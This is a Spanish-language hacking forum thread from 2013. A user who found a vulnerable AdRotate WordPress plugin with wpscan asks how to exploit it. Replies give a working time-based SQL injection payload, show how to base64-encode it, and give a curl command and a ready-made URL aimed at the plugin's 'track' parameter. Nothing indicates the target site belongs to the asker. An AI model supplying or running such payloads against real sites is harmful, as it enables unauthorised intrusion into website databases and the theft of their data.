Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: TheBlack en Agosto 20, 2013, 01:26:09 PM

Título: [Duda] Wordpress vulnerable sql
Publicado por: TheBlack en Agosto 20, 2013, 01:26:09 PM
Buenas , hola a todos ! (Perdona si el post no va en el sitio adecuado )

Pues tenia una duda con una inyección sql en wordpress. Analizando con wpscan veo que hay un plugin vulnerable . En el wpscan me sale esto :

*Title:Adrotate plugin <= 3.6.5 SQL Injection Vulnerability
*Reference: http:www.exploit-db.com/exploits/18114/

En la pagina de exploit-db me sale el codigo vulnerable pero realmente no se que hacer con eso , si alguien me puede echar una mano o pasarme algun tutorial para leer e informarme se lo agradeceria
Título: Re:Wordpress vulnerable sql
Publicado por: hielasangre en Agosto 20, 2013, 02:35:58 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Buenas , hola a todos ! (Perdona si el post no va en el sitio adecuado )

Pues tenia una duda con una inyección sql en wordpress. Analizando con wpscan veo que hay un plugin vulnerable . En el wpscan me sale esto :

*Title:Adrotate plugin <= 3.6.5 SQL Injection Vulnerability
*Reference: http:www.exploit-db.com/exploits/18114/

En la pagina de exploit-db me sale el codigo vulnerable pero realmente no se que hacer con eso , si alguien me puede echar una mano o pasarme algun tutorial para leer e informarme se lo agradeceria


payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`
curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded

es facil la vulnerabilidad esta en la variable track. ahi inyecta el payload encodeado en base64

Título: Re:Wordpress vulnerable sql
Publicado por: TheBlack en Agosto 20, 2013, 03:01:54 PM
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
Título: Re:Wordpress vulnerable sql
Publicado por: arthusu en Agosto 20, 2013, 04:00:14 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
O tambien podrias ponerte a estudiar sqli para que entiendas ese payload ;)
Título: Re:Wordpress vulnerable sql
Publicado por: hielasangre en Agosto 20, 2013, 04:15:17 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
O tambien podrias ponerte a estudiar sqli para que entiendas ese payload ;)

jajaja tenia planeado decir lo mismo pero no quería ser duro xD
Título: Re:Wordpress vulnerable sql
Publicado por: TheBlack en Agosto 20, 2013, 04:34:14 PM
Perdon no se me ha ententido muy bien , eh parecido un poco lammer xD, decia algun tutorial o por donde comenzar para aprender .
Título: Re:Wordpress vulnerable sql
Publicado por: TUNOVATO en Agosto 27, 2013, 03:18:23 AM
saludos compa;

haz lo siguiente:

http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj


http://www.AQUITUWEB.com/wp-content/plugins/adrotate/adrotate-out.php?track= <-- AQUI ESTO: MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

ESTO: MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

ES ESTO: 1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#


lo cual esta encodeado en based64


si no entendistes como funciona.....  vas a tener que leeerrr y mucho..... o mejor te dedicas a otras cosas...  :o


saludos;